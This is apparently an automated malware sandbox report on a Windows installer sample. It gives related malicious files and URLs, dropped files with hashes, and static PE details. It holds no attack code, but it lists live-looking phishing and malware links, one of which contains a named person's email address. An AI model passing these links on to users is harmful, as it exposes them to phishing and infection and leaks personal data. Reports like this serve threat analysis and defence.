	https://siasky.net/HAAh0lbqGg87rSgDkyrEMPPMMHM-WI9wF2fttKx6feA-5w	Get hash	malicious	Browse	142.250.186.78 142.250.185.225
	ORDER INQUIRY.exe	Get hash	malicious	Browse	142.250.186.78 142.250.185.225
	https://secure.centurysl.com	Get hash	malicious	Browse	142.250.186.78 142.250.185.225
	https://www.jenloluy.com/	Get hash	malicious	Browse	142.250.186.78 142.250.185.225
	https://ligos.pl/wp-crons/login.php	Get hash	malicious	Browse	142.250.186.78 142.250.185.225
	https://www.officefileviewer.com/	Get hash	malicious	Browse	142.250.186.78 142.250.185.225
	swift-confirmation-pdf.exe	Get hash	malicious	Browse	142.250.186.78 142.250.185.225
	https://amazon-security-info.lnk.to/31X2wtfX	Get hash	malicious	Browse	142.250.186.78 142.250.185.225
	rfq.vbs	Get hash	malicious	Browse	142.250.186.78 142.250.185.225
	https://infoemailtechprobeta.com/api/tracking/click?email=sheila.wallace@essentialenergy.com.au&campaign=vmware&followUp=vmware_XpeW-VJgzv&tag=0705&event=sjwo2JfFTe&sid=7112	Get hash	malicious	Browse	142.250.186.78 142.250.185.225
	july RFQ_PDF.vbs	Get hash	malicious	Browse	142.250.186.78 142.250.185.225

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp\System.dll	Handu Korean.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Gen.Variant.Nemesis.8923.31381.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.MSIL.Inject.10631.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Gen.Variant.Nemesis.8923.31381.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Gen.Variant.Nemesis.8928.4279.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Gen.Variant.Nemesis.8928.4279.exe	Get hash	malicious	Browse
	ORDER INQUIRY.exe	Get hash	malicious	Browse
	ORDER INQUIRY.exe	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware2.13948.exe	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware2.13948.exe	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware2.32239.exe	Get hash	malicious	Browse
	PqoFjHwVFk.exe	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware2.32239.exe	Get hash	malicious	Browse
	RFQ DC24a-MX.exe	Get hash	malicious	Browse
	PqoFjHwVFk.exe	Get hash	malicious	Browse
	RFQ DC24a-MX.exe	Get hash	malicious	Browse
	RFQ 37 - DR106305 - 5827764-ArcelorMittal.exe	Get hash	malicious	Browse
	RFQ 37 - DR106305 - 5827764-ArcelorMittal.exe	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware2.10956.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
File Type:	data
Category:	dropped
Size (bytes):	1391
Entropy (8bit):	7.705940075877404
Encrypted:	false
SSDEEP:	24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
MD5:	0CD2F9E0DA1773E9ED864DA5E370E74E
SHA1:	CABD2A79A1076A31F21D253635CB039D4329A5E8
SHA-256:	96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
SHA-512:	3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	0..k0..S............@.YDc.c...0....H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0....H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.\|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I......A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.\|C.t..t.....0.[q6....00\H..;..}`...).........A.......\|.;F.H..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..\|o..;.....'...}~.."......

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
File Type:	Microsoft Cabinet archive data, 61712 bytes, 1 file
Category:	dropped
Size (bytes):	61712
Entropy (8bit):	7.995044632446497
Encrypted:	true
SSDEEP:	1536:gzjJiDImMsrjCtGLaexX/zL09mX/lZHIxs:gPJiDI/sr0Hexv/0S/zx
MD5:	589C442FC7A0C70DCA927115A700D41E
SHA1:	66A07DACE3AFBFD1AA07A47E6875BEAB62C4BB31
SHA-256:	2E5CB72E9EB43BAAFB6C6BFCC573AAC92F49A8064C483F9D378A9E8E781A526A
SHA-512:	1B5FA79E52BE495C42CF49618441FB7012E28C02E7A08A91DA9213DB3AB810F0E83485BC1DD5F625A47D0BA7CFCDD5EA50ACC9A8DCEBB39F048C40F01E94155B
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	MSCF............,...................I........y.........Tf. .authroot.stl..W.`.4..CK..8U[...q.yL'sf!d.D..."2.2g.<dVI.!.....$).\...!2s..(...[.T7..{}...g....g.....w.km$.&\|..qe.n.8+..&...O...`...+..C......`h!0.I.(C..1Q*L.p..".s..B.....H......fUP@..5...(X#.t.2lX.>.y\|D.0Z0...M....I(.#.-... ...(.J....2..`.hO..{l+.bd7y.j..u.....3....<......3....s.T...._.'...%{v...s..............KgV.0..X=.A.9w9.Ea.x..........\.=.e.C2......9.......`.o... .......@pm.. a.....-M.....{...s.mW.....;.+...A......0.g..L9#.v.&O>./xSH.S.....GH.6.j...`2.(0g..... Lt........h4.iQ?....[.K.....uI......}.....d....M.....6q.Q~.0.\.'U^)`..u.....-........d..7...2.-.2+3.....A./.%Q...k...Q.,...H.B.%..O..x..5\...Hk.......B.';"Ym.'....X.l.E.6..a8.6..nq..x.r4..1t.....,..u.O..O.L...Uf...X.u.F .(.(.....".q...n{%U.-u....l6!....Z....~o0.}Q'.s.i....7...>4x...A.h.Mk].O.z.].6...53...b^;..>e..x.'1..\p.O.k..B1w..\|..K.R.....2.e0..X.^...I...w..!.v5B]x..z.6.G^uF..].b.W...'..I.;..p..@L{.E..@W..3.&...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
File Type:	data
Category:	dropped
Size (bytes):	192
Entropy (8bit):	2.773803200765873
Encrypted:	false
SSDEEP:	3:kkFklCsfJPtfllXlE/zMc9NtNNX8RolJuRdyo1dlUKlGXJlDdt:kKb+Q1bNMa8Rdy+UKcXP
MD5:	36554B91BD91AE6F9093AEC7135ABC63
SHA1:	0D2045C9FA93862996A7447EF109E4A1E7782F06
SHA-256:	DD2032FEADEE236FD9DFE655F0D4F98DBBCB9E8D9429AAC1BF64E20A87E67395
SHA-512:	9865FEFAF42F06F1E09B8D30D4CE18B4B131C88A6A7CF8F257F5838F83485DDDE6CE30E7CB02E18621FB2A14F898459E93DD1989BAAD3E2827DA52ECB95E518E
Malicious:	false
Reputation:	low
Preview:	p...... ........q.:....(....................................................... ..........~....N..............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".5.a.6.2.8.1.5.c.-.5.6.f."...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
File Type:	data
Category:	modified
Size (bytes):	326
Entropy (8bit):	3.1236216553575558
Encrypted:	false
SSDEEP:	6:kKm0+N+SkQlPlEGYRMY9z+4KlDA3RUeWlEZ21:u0NkPlE99SNxAhUeE1
MD5:	1EEC5A770E5DE50B235105C9A7CBB230
SHA1:	9AD713C57B559E061100C3CF37D5A8A95EA49173
SHA-256:	1A6DD52EE40E30550E550D2B410B2F86DF9542C3FD9EE1FA86544C0B690B357B
SHA-512:	99450DB2D063FA3073735C1CB714C24E100E02A6B48A677EAC5F32EA0DB9CAB37A530156F9B763F4AB7BB46A5917A5EE3A608C4A71EEA53CDD6622D6378D0505
Malicious:	false
Reputation:	low
Preview:	p...... ................(....................................................... .........L.........$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.9.f.4.c.9.6.9.8.b.d.8.1.:.0."...

C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp\System.dll

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	5.814115788739565
Encrypted:	false
SSDEEP:	192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
MD5:	CFF85C549D536F651D4FB8387F1976F2
SHA1:	D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
SHA-256:	8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
SHA-512:	531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Handu Korean.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Gen.Variant.Nemesis.8923.31381.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Trojan.MSIL.Inject.10631.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Gen.Variant.Nemesis.8923.31381.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Gen.Variant.Nemesis.8928.4279.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Gen.Variant.Nemesis.8928.4279.exe, Detection: malicious, Browse Filename: ORDER INQUIRY.exe, Detection: malicious, Browse Filename: ORDER INQUIRY.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.W32.AIDetect.malware2.13948.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.W32.AIDetect.malware2.13948.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.W32.AIDetect.malware2.32239.exe, Detection: malicious, Browse Filename: PqoFjHwVFk.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.W32.AIDetect.malware2.32239.exe, Detection: malicious, Browse Filename: RFQ DC24a-MX.exe, Detection: malicious, Browse Filename: PqoFjHwVFk.exe, Detection: malicious, Browse Filename: RFQ DC24a-MX.exe, Detection: malicious, Browse Filename: RFQ 37 - DR106305 - 5827764-ArcelorMittal.exe, Detection: malicious, Browse Filename: RFQ 37 - DR106305 - 5827764-ArcelorMittal.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.W32.AIDetect.malware2.10956.exe, Detection: malicious, Browse
Reputation:	high, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....Oa...........!....."..................@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Folketingsvalget160\Tatou\Borgerdyderne\ArtDeco_brown_4.bmp

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 100x100, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=3], baseline, precision 8, 110x110, frames 3
Category:	dropped
Size (bytes):	5580
Entropy (8bit):	7.8610675947118915
Encrypted:	false
SSDEEP:	96:BSTzREFQkzwePWleSvZpEZSrqrf4uFV8TgV9tJQkzdTEwAeMhqD7n0:oXRFuWlzvZpEZSurdGyse48Mk0
MD5:	556BED5FAA7C3E26C56BC9FCFC529723
SHA1:	0D446CB0DAD1D8388F9422DDA12A6ECF0C81EB2E
SHA-256:	A78B823495E0768D15C0E73424969485188B135D62DAC511B8FE531AA70F282A
SHA-512:	4621DDC1BED6BA57776631B507783F410C14EAD87D9179D60A41E4E2504F7F1DF83C43EA49899E482151AC4C8940308E15CCDF371419AE8EB3EB538DEED9FC90
Malicious:	false
Preview:	......JFIF.....d.d.....:Exif..MM.......Q...........Q..........aQ..........a.......C....................................................................C.......................................................................n.n.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(....m.....?g_.\|\......M.....z........Eqsg........]..............).....S..gS...w.G;r....L...5.?....A.wd.VO.........g8.==H...\|. .B.mp0.pH$..N9...~6.a...s........!....8.O.)..5fS...o..N:..z..^.........._....4j<.<..~.......>..5..O.A..d..HW.....l. g..'......w^.Y.[S.e..".t..1.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Folketingsvalget160\Tatou\Borgerdyderne\BRUGERUDGAVERNES.Frd6

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe
File Type:	data
Category:	dropped
Size (bytes):	95398
Entropy (8bit):	7.142865046210158
Encrypted:	false
SSDEEP:	1536:wTXy5OwFU5IzmvU6KCD411ASl2SRuPuDYpNpJrf7pDdp/L2d15ADB8+VNjiFg:wT0+5ISvpD411Z2SReuDWjdxC3Ad8+T
MD5:	B3660ECDB5FC12143EA49E0C9AD5ED95
SHA1:	757E5E938651F3FB1D17BD73E450A175211F75E0
SHA-256:	F3DDEF2100688EEE45D1BBDB7CF698CE2E232CCAA6A5BD764E3B21B3CA84A6D3
SHA-512:	CBF07D0DEF4D5D5AD3D462CA06475EB54A66468CEE956E01B8AF0DF843E486EBAD52C751A195B24F680AC8E451D62E1E401BE5333796E5169467C8CC11B20753
Malicious:	false
Preview:	<B...<..g..Q..y..e..C..{......<...w....:........<...v..u<.<.<.<T<Q..6..S..p..._<.<...<...B...<^<.<.<.<G..U1..~<...$<.<....<...u..M..%<Q......</.....O<..I<.<...<c.4..V.w........6<......<...0...<)...<......2..d<;.. ......<...g...<...8..o<.....Xw..u.........<Y..v..v...<J.....L<...>................._<.....l...<J......<i........#1.w.j...'.3.....%Rk69....mOiJ.Q.9.U..-.5..{....).x.f..4I)k.$....N....v`..V...(#.A.yd...q..>;.D.....2\|.._.....a.0s.[....F.@4.!..................................................................................N..'.3.....%Rk69....mOiJ.Q.9.U..-.5..{....).x.f..4I)k.$....N....v`..V...(#.A.yd...q..>;.D.....2\|.._.....a.0s.[....F.@4.!B......................!N........................S....................................................................................&!y.._.&U.A+r....*m.C....D.\.J....0....k~...-..).G.5................................................................................nJ./..................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Folketingsvalget160\Tatou\Borgerdyderne\FOLKESANGEREN\JACKROLLING\battery.png

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	308
Entropy (8bit):	6.786347589283681
Encrypted:	false
SSDEEP:	6:6v/lhPfh78KFJTKRqtJCKQtLVGhdNk2tbBEQtMtfp:6v/7XtzTQyJQKhdNNvESMtx
MD5:	3D7D690C25A5E0D9AEA089BDC6C381FD
SHA1:	466C54F12949AA0DF972D37FCAC03F51A59A7B6C
SHA-256:	39F75FEF09B32BFB96A2F2989F7E200D421A82480FE13F54CFCFE0F88D86F14D
SHA-512:	3A0382444F49029D4E25D83DCA58E57E99B2D541AE3863BE46776D6CCCD8A2E8DC20ED985B0F597E9BFC0B4E73FC42A02B3541A27B4AB4E92955F69DCF0D3FCA
Malicious:	false
Preview:	.PNG........IHDR................a....IDATx.c...?N...."4<.?......I..6L`........A4...'.....GS...../n...B............_.....n.. q..x{3.t...3..},.l...Q`...p...'.........m.X.L.+..(N..@.?"6..HX......V....}...d....H..Qq1.....I........H.....d..7 4..Yy.....`8D.wt..J......g...lD..A..j....A.....IEND.B`.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Folketingsvalget160\Tatou\Borgerdyderne\FOLKESANGEREN\JACKROLLING\call-stop-symbolic.symbolic.png

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	238
Entropy (8bit):	6.633113725010705
Encrypted:	false
SSDEEP:	6:6v/lhPysTQAt09hY3OT5K1kmQ/BS4GwsRE5fkt8up:6v/7NG9eM5KzQ/BSLvEdm8c
MD5:	4A59AABC67F76907B51FF2E4CCF26074
SHA1:	451F062644DB800453D9CA0FBE0EE53C58AEBFF0
SHA-256:	60F1A6D45B16A0F76F7E3BAA683D506F2B6DD021EA25C32EB6871DD4FC7B9E12
SHA-512:	8728198DDB40BF76EC49DFF42242D82C518FD2568E37F011A3C6727595F5AF14E743749683AE5C96D783EE9CE91480EC40453F092F72988D718BA231E6D8FEEB
Malicious:	false
Preview:	.PNG........IHDR................a....sBIT....\|.d.....IDAT8...Mj.Q.E./M....!.&.J.\A.8..{.\.h.N.4.!.v.TC.<.....:.....y.+...>j.9r<^..`....D..\|..UB>D..+\|F.......2<c.]..6.!O\|...6Y...21......1.A"\...j.......%\S..~..'8..A..$......IEND.B`.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Folketingsvalget160\Tatou\Borgerdyderne\FOLKESANGEREN\JACKROLLING\folder-saved-search.png

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe
File Type:	PNG image data, 16 x 16, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	622
Entropy (8bit):	6.99329932907151
Encrypted:	false
SSDEEP:	12:6v/7X0Z7HBwN1+swFIz8NqwnN14LBHFbSj50iFFp2fpws8A3L0OCV1uOk1:C0BqExqQ6BlsqiQhZrN041
MD5:	D801F277C4062AE10A011ADC20D4A6D7
SHA1:	49C7426ACC24711EBAEF5FE5EBD220735F3AB91D
SHA-256:	0247A2133037B10E3EDD2AA85773AEFA06483CB76171675BC331A844C275F925
SHA-512:	E0753F8BC9B5D02E9ABFCA7088337CA8BE4ED3654071606EEA30BFBD6B82075B567886B9274BF744DC73D1F06A2BB1DB151B1A250922758511CEA4B365F0ADFC
Malicious:	false
Preview:	.PNG........IHDR.............(-.S....sBIT.....O.....pHYs..........+......tEXtSoftware.www.inkscape.org..<.....tEXtTitle.Adwaita Folder Icons.._.....tEXtAuthor.Lapo Calamandrei..*...RtEXtCopyright.CC Attribution-ShareAlike http://creativecommons.org/licenses/by-sa/4.0/.Tb.....PLTE.........................................~......................................................................................................tRNS.@NS..................IDAT.WU....@....slP...3...?..y....`.1.....;..\DD...............O$I^#.X...'a..:...H2...=\|Z+H.dyV.y.r...e......c.U@.....7..A.a.... .........IEND.B`.

\Device\ConDrv

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	30
Entropy (8bit):	3.964735178725505
Encrypted:	false
SSDEEP:	3:IBVFBWAGRHneyy:ITqAGRHner
MD5:	9F754B47B351EF0FC32527B541420595
SHA1:	006C66220B33E98C725B73495FE97B3291CE14D9
SHA-256:	0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
SHA-512:	C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
Malicious:	false
Preview:	NordVPN directory not found!..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	5.570138438525555
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe
File size:	471150
MD5:	6164a2f75a0c585d3256faecac344573
SHA1:	684171a971270ecef4e56293f7808e5989989d1d
SHA256:	c5e737000bb35f513800bfa5a9efd5c43a5771f1ae77fe4d4284a25111d4f9c8
SHA512:	b2eb58fd7bee2542eb9c88165ab5246bdd247d146ca4db4a9d6adf703e436ddc2044612a0378e2e88fab1ed3b795d48a897b82c5716b447e2ff0a42be338fa4f
SSDEEP:	6144:xbE/HUd5+xj6TjiyAKV1QDU4CqAhoJeoeRScTlkMek3bh2eMPwjz/8nO8NOe:xbiRJWVODU4FKPdRSCTeof5zK
TLSH:	40A4BFA4BF9FBC82E5550E3492B0FA7811597C394E6F0913B6563F9E783214B9A2430F
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf._9..Pf..Pg.LPf._;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j.........

File Icon


Icon Hash:	01787266eaabea61

Static PE Info

General

Entrypoint:	0x40352d
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x614F9B5A [Sat Sep 25 21:57:46 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	56a78d55f3f7af51443e58e0ce2fb5f6

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 000003F4h
push ebx
push esi
push edi
push 00000020h
pop edi
xor ebx, ebx
push 00008001h
mov dword ptr [ebp-14h], ebx
mov dword ptr [ebp-04h], 0040A2E0h
mov dword ptr [ebp-10h], ebx
call dword ptr [004080CCh]
mov esi, dword ptr [004080D0h]
lea eax, dword ptr [ebp-00000140h]
push eax
mov dword ptr [ebp-0000012Ch], ebx
mov dword ptr [ebp-2Ch], ebx
mov dword ptr [ebp-28h], ebx
mov dword ptr [ebp-00000140h], 0000011Ch
call esi
test eax, eax
jne 00007FA81C98A45Ah
lea eax, dword ptr [ebp-00000140h]
mov dword ptr [ebp-00000140h], 00000114h
push eax
call esi
mov ax, word ptr [ebp-0000012Ch]
mov ecx, dword ptr [ebp-00000112h]
sub ax, 00000053h
add ecx, FFFFFFD0h
neg ax
sbb eax, eax
mov byte ptr [ebp-26h], 00000004h
not eax
and eax, ecx
mov word ptr [ebp-2Ch], ax
cmp dword ptr [ebp-0000013Ch], 0Ah
jnc 00007FA81C98A42Ah
and word ptr [ebp-00000132h], 0000h
mov eax, dword ptr [ebp-00000134h]
movzx ecx, byte ptr [ebp-00000138h]
mov dword ptr [00434FB8h], eax
xor eax, eax
mov ah, byte ptr [ebp-0000013Ch]
movzx eax, ax
or eax, ecx
xor ecx, ecx
mov ch, byte ptr [ebp-2Ch]
movzx ecx, cx
shl eax, 10h
or eax, ecx

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8610	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc0000	0x543c8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6897	0x6a00	False	0.6661261792452831	data	6.458398214928006	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x14a6	0x1600	False	0.4392755681818182	data	5.024109281264143	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x2b018	0x600	False	0.521484375	data	4.15458210408643	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x36000	0x8a000	0x0	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc0000	0x543c8	0x54400	False	0.3847395446958457	data	4.4894638245550915	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0xc05f8	0x42028	dBase IV DBT, blocks size 0, block length 8192, next free block index 40, next free block 13824, next used block 0	English	United States
RT_ICON	0x102620	0x4228	dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 4294967295	English	United States
RT_ICON	0x106848	0x25a8	data	English	United States
RT_ICON	0x108df0	0x1a68	data	English	United States
RT_ICON	0x10a858	0x1628	dBase IV DBT of \200.DBF, blocks size 0, block length 4096, next free block index 40, next free block 2988225716, next used block 3402812106	English	United States
RT_ICON	0x10be80	0x10a8	data	English	United States
RT_ICON	0x10cf28	0xea8	data	English	United States
RT_ICON	0x10ddd0	0xba8	data	English	United States
RT_ICON	0x10e978	0xa68	dBase IV DBT of \200.DBF, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0	English	United States
RT_ICON	0x10f3e0	0x988	data	English	United States
RT_ICON	0x10fd68	0x8a8	dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 14455685, next used block 16228229	English	United States
RT_ICON	0x110610	0x810	data	English	United States
RT_ICON	0x110e20	0x6c8	data	English	United States
RT_ICON	0x1114e8	0x690	data	English	United States
RT_ICON	0x111b78	0x668	data	English	United States
RT_ICON	0x1121e0	0x568	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0x112748	0x4c8	data	English	United States
RT_ICON	0x112c10	0x468	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0x113078	0x2e8	dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 483465, next used block 0	English	United States
RT_ICON	0x113360	0x1e8	data	English	United States
RT_ICON	0x113548	0x1c8	data	English	United States
RT_ICON	0x113710	0x128	GLS_BINARY_LSB_FIRST	English	United States
RT_DIALOG	0x113838	0x100	data	English	United States
RT_DIALOG	0x113938	0x11c	data	English	United States
RT_DIALOG	0x113a58	0xc4	data	English	United States
RT_DIALOG	0x113b20	0x60	data	English	United States
RT_GROUP_ICON	0x113b80	0x13a	data	English	United States
RT_VERSION	0x113cc0	0x3c4	data	English	United States
RT_MANIFEST	0x114088	0x33e	XML 1.0 document, ASCII text, with very long lines, with no line terminators	English	United States

Imports

DLL	Import
